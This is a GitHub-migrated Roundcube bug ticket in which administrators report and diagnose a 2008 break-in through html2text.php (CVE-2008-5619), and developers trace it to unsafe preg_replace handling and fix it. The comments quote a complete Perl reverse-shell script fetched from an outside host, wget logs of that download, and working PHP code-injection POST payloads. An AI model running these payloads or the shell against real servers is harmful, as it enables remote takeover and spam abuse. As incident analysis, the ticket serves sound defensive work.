Break-in possiblity via html2text.php? #1993

Closed
rcubetrac opened this Issue Dec 9, 2008 · 25 comments

Projects

None yet

1 participant

@rcubetrac
Collaborator

Reported by RealMurphy on 9 Dec 2008 10:46 UTC as Trac ticket #1485618

Hi all,

since I cannot reproduce this I try to describe this problem from the current installation status and not against trunk (sorry for that).

Last night someone broke into my apache-container via roundcube (99.9% sure here), the system is a current Debian Lenny, with these versions:

roundcube 0.2-beta
PHP is 5.2.6
mailserver is postfix on a remote virtual server

In the logs I have found the following:

apache's access.log:

192.168.100.2 - - [+0100](08/Dec/2008:23:07:50) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [+0100](08/Dec/2008:23:07:53) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [+0100](08/Dec/2008:23:05:16) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [+0100](08/Dec/2008:23:08:09) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"

192.168.100.2 is another webserver acting as a proxy to this webmail apache (i.e. just rewriting and forwarding the requests), the real IP was

200.171.152.187 - - [+0100](08/Dec/2008:23:07:50) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "
Googlebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [+0100](08/Dec/2008:23:07:53) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "
Googlebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [+0100](08/Dec/2008:23:05:16) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "G
ooglebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [+0100](08/Dec/2008:23:08:09) "POST /roundcube/bin/html2text.php HTTP/1.1" 502 595 "-"
"Googlebot/2.1 ( http://www.google.com/bot.html)"

In the error log I see this nasty bit at the same time:

--2008-12-08 23:05:16--  http://mmbt.co.uk/img/back.txt
Resolving mmbt.co.uk... 81.31.121.138
Connecting to mmbt.co.uk|81.31.121.138|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 541 [to: `back.txt.1'

     0K                                                       100% 56.0M=0s

2008-12-08 23:05:16 (56.0 MB/s) - `back.txt.1' saved [541/541](text/plain]
Saving)

For completeness this is the script which was downloaded:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

There is nothing in either console, errors or sendmail in roundcubes log messages.

Since I believe this is potentially dangerous (and this incident happened to put my box onto several blacklist for sending out >50k spam emails) I've bumbed up the severity.

Anything else you could need from me?

Cheers

Carsten

Keywords: security
Migrated-From: http://trac.roundcube.net/ticket/1485618

@rcubetrac
Collaborator

Owner changed by @alecpl on 9 Dec 2008 11:10 UTC

=> none

@rcubetrac
Collaborator

Milestone changed by @alecpl on 9 Dec 2008 11:10 UTC

later => 0.2-stable

@rcubetrac
Collaborator

Comment by ziba on 9 Dec 2008 16:24 UTC

bin/html2text.php does use html_entity_decode which had a security issue:
http://www.juniper.net/security/auto/vulnerabilities/vuln17296.html

but that was supposed to be fixed in PHP 5.1.3-RC1

@rcubetrac
Collaborator

Comment by ksteinhoff on 9 Dec 2008 17:10 UTC

Why do you suspect html2text.php? The time stamp on error log entry you quote is 23:05:16 and the time stamps in your transfer log lines begin at 23:07:50.

@rcubetrac
Collaborator

Comment by RealMurphy on 10 Dec 2008 08:21 UTC

OK, trying to do it better this time. html2text.php was the only call with POST data. unless I'm mistaken with a GET you will not be able to break into a system right? The initial copy & paste was not covering the full log file, sorry about that. This is the full access.log

192.168.100.2 - - [+0100](08/Dec/2008:17:41:46) "GET /roundcube/skins/default/images/display/info.png HTTP/1.1" 200 2162 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [+0100](08/Dec/2008:23:04:51) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [+0100](08/Dec/2008:23:04:55) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 79 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [+0100](08/Dec/2008:23:04:59) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 88 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [+0100](08/Dec/2008:23:05:09) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [+0100](08/Dec/2008:23:05:38) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [+0100](08/Dec/2008:23:06:26) "GET /roundcube/ HTTP/1.1" 200 1247 "http://www.google.com/search?hl=en&q=intitle:%22RoundCube+Webmail%22+site:com&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [+0100](08/Dec/2008:23:06:27) "GET /roundcube/skins/default/images/favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [+0100](08/Dec/2008:23:06:28) "GET /roundcube/skins/default/common.css HTTP/1.1" 200 6680 "https://myhost/roundcube/"
 "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [+0100](08/Dec/2008:23:06:28) "GET /roundcube/program/js/common.js HTTP/1.1" 200 16650 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [+0100](08/Dec/2008:23:06:29) "GET /roundcube/program/js/app.js HTTP/1.1" 200 110423 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [+0100](08/Dec/2008:23:06:32) "GET /roundcube/skins/default/images/roundcube_logo.png HTTP/1.1" 200 4868 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [+0100](08/Dec/2008:23:06:32) "GET /roundcube/skins/default/images/listheader_aqua.gif HTTP/1.1" 200 270 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [+0100](08/Dec/2008:23:06:32) "GET /roundcube/skins/default/images/buttons/bg.gif HTTP/1.1" 200 211 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [+0100](08/Dec/2008:23:06:40) "GET /roundcube/program/js/tiny_mce/r.php HTTP/1.1" 200 33924 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [+0100](08/Dec/2008:23:06:41) "GET /roundcube/program/js/tiny_mce/r.php HTTP/1.1" 200 33924 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [+0100](08/Dec/2008:23:07:50) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [+0100](08/Dec/2008:23:07:53) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [+0100](08/Dec/2008:23:05:16) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [+0100](08/Dec/2008:23:08:09) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [+0100](09/Dec/2008:06:55:28) "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.168.100.2 - - [+0100](09/Dec/2008:12:56:27) "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
@rcubetrac
Collaborator

Comment by estadtherr on 10 Dec 2008 19:29 UTC

If I understand the description, a vulnerability in html2text.php allowed an attacker to cause your web server to download a malicious perl script (is back.txt the perl script or is back.txt yet another file?) This perl script opens a socket to a host/port specified on its command line and hooks a command shell's input/output to that socket. Through this remote shell, the attacker was able to send out spam from your server.

How did the attacker get the perl script to execute? Are there two vulnerabilities, i.e. allowing a download and allowing execution of an arbitrary script?

@rcubetrac
Collaborator

Comment by RealMurphy on 10 Dec 2008 19:52 UTC

It looks like back.txt is the local file name of the perlscript. Since I just see the wget output and not the command line it's hard to tell. wget downloaded this file to /tmp and also a zip file named jess.zip which I yet have to figure out what this one does (sorry for not mentioning this earlier, I forgot to look where back.txt would be on the system):

webmail:/tmp# file jess.zip
jess.zip: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
webmail:/tmp# ldd jess.zip
        not a dynamic executable

Of course this is not a zip file but a root exploit, running strings shows:

Linux vmsplice Local Root Exploit
 By qaaz
!@#$

OK, rounding it up again: It seems that the multiple POST requests were used to downlaod the perl script, the root exploit and was possibly also used for starting it, however, that part I still don't know how they might have achieved it - but my knowledge there is rather limited.

@rcubetrac
Collaborator

Keywords changed by @till on 11 Dec 2008 16:06 UTC

security

@rcubetrac
Collaborator

Comment by @till on 11 Dec 2008 16:11 UTC

That's interesting and we haven't really analyzed this yet, but the quickfix to this issue is to install mod_security on the server. GotRoot has a bunch of filter rules and they catch this stuff easily.

Not the solution to the problem, but a workaround.

Thanks for reporting!

@rcubetrac
Collaborator

Comment by @alecpl on 12 Dec 2008 08:05 UTC

Found vulnerable preg_replace() use. Fixed in f50cc72, but we'll know for sure when we get POST data used for attack. Closing the ticket now.

@rcubetrac
Collaborator

Status changed by @alecpl on 12 Dec 2008 08:05 UTC

new => closed

@rcubetrac rcubetrac closed this Dec 12, 2008
@rcubetrac
Collaborator

Comment by RealMurphy on 22 Dec 2008 07:36 UTC

I'm still running 0.2-beta as a kind of honeypot. During the night from Saturday to Sunday someone tried again the same hack, but this line did not really lock much:

file_put_contents('/var/log/roundcube/hack', date('r').': '.print_r($_REQUEST, true)."\n", FILE_APPEND);

The result:

Sun, 21 Dec 2008 02:42:28 +0100: Array
(
)

Sun, 21 Dec 2008 02:42:32 +0100: Array
(
)

Sun, 21 Dec 2008 02:42:54 +0100: Array
(
)

Apache log lines:

192.168.100.2 - - [+0100](21/Dec/2008:02:42:27) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [+0100](21/Dec/2008:02:42:32) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 79 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [+0100](21/Dec/2008:02:42:54) "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"

I leave this issue closed but may add more info on the exploit if I get some

@rcubetrac
Collaborator

Comment by @alecpl on 22 Dec 2008 07:47 UTC

check variables_order in php.ini and set to "GPC"

@rcubetrac
Collaborator

Comment by RealMurphy on 22 Dec 2008 08:01 UTC

Done, waiting for next attack

@rcubetrac
Collaborator

Comment by pnfisher on 22 Dec 2008 23:10 UTC

We had someone probe our system for the html2text.php exploit today. I've removed the "Host" header, which was properly set.

POST /rc/bin/html2text.php HTTP/1.1
Pragma: no-cache
Accept: */*
Content-Type: ''
Connection: Keep-Alive
Content-Length: 28

<b>{${system(uname -a)}}</b>
@rcubetrac
Collaborator

Comment by @alecpl on 23 Dec 2008 07:36 UTC

This bug is known as CVE-2008-5619

@rcubetrac
Collaborator

Comment by paul on 14 Jan 2009 08:47 UTC

We were also attacked through html2text.php. The hacker tried to install a backdoor, probably using 'b{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}/b' as postdata, as explained on http://zastita.com/015038/roundcube-webmail-.html.
In the announcement of the security update for Roundcube 0.2 Beta, you might have mentioned that 0.1 Stable was also vulnerable.

@rcubetrac
Collaborator

Comment by stuge on 6 May 2009 23:52 UTC

A customer of mine was also hit by this.

While [fixes the problem in a perfectly safe manner and also adds proper handling for multibyte characters (excellent!) no analysis I have read so far has been completely correct about what is really going on.

preg_replace() with the e modifier allows execution of PHP code, but that's not the problem.

Before the superior fix in f50cc72(f50cc72]), the problem was how entries in the html2text::$replace array were written like so:

      'strtoupper("\\1")',                    // <b>

instead of:

      'strtoupper(\'\\1\')',                    // <b>

When using double quotes in the strtoupper() call, any text which is replaced into there from the POST data can contain Complex strings and will have those complex strings processed by PHP, when the entire argument really must be handled as untrusted input.

Using single quotes clarifies to the PHP interpreter that this is data which should not be processed further, so any complex strings will be ignored.

@rcubetrac
Collaborator

Comment by stuge on 6 May 2009 23:56 UTC

Replying to stuge:

no analysis I have read so far has been completely correct about what is really going on.

To be fair, Jacobo Avariento Gimeno at Sofistic described the problem accurately, but didn't point out the double quotes in the function call.

@rcubetrac
Collaborator

Comment by gittar on 14 Feb 2010 01:35 UTC

Well I think you are lucky to read the logs time and identified the script, I found many people who are totally unaware of the fact that there is a script running on their mail server to send spam mails. I think you need to check the server cache for this purpose, there might be any other activity (unusual) on the server like increasing page impression or comparing bandwidth of the two consecutive days of that time. I would like to suggest you avg download to avoid these situations. Thanks

@rcubetrac
Collaborator

Severity changed by gittar on 14 Feb 2010 01:35 UTC

critical => minor

@rcubetrac
Collaborator

Milestone changed by gittar on 14 Feb 2010 01:35 UTC

0.2-stable => later

@rcubetrac
Collaborator

Comment by @alecpl on 26 Feb 2010 07:11 UTC

Re-assigned Milestone and Version

@rcubetrac
Collaborator

Milestone changed by @alecpl on 26 Feb 2010 07:11 UTC

=> later

@rcubetrac
Collaborator

Comment by tbbw on 2 Jun 2010 01:40 UTC

I can confirm that ppl have started to make auto infection scripts for this vuln.
Just yesterday i'we got a perl irc bot thru this hole that got it's nest on undernet.
some .ro kiddys farming.

They scan common webmail locations so until this is fixed it's best to change ur webmail url to something cryptic instead of myhost.com/webmail or myhost.com/mail

@rcubetrac rcubetrac added this to the later milestone Mar 20, 2016
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment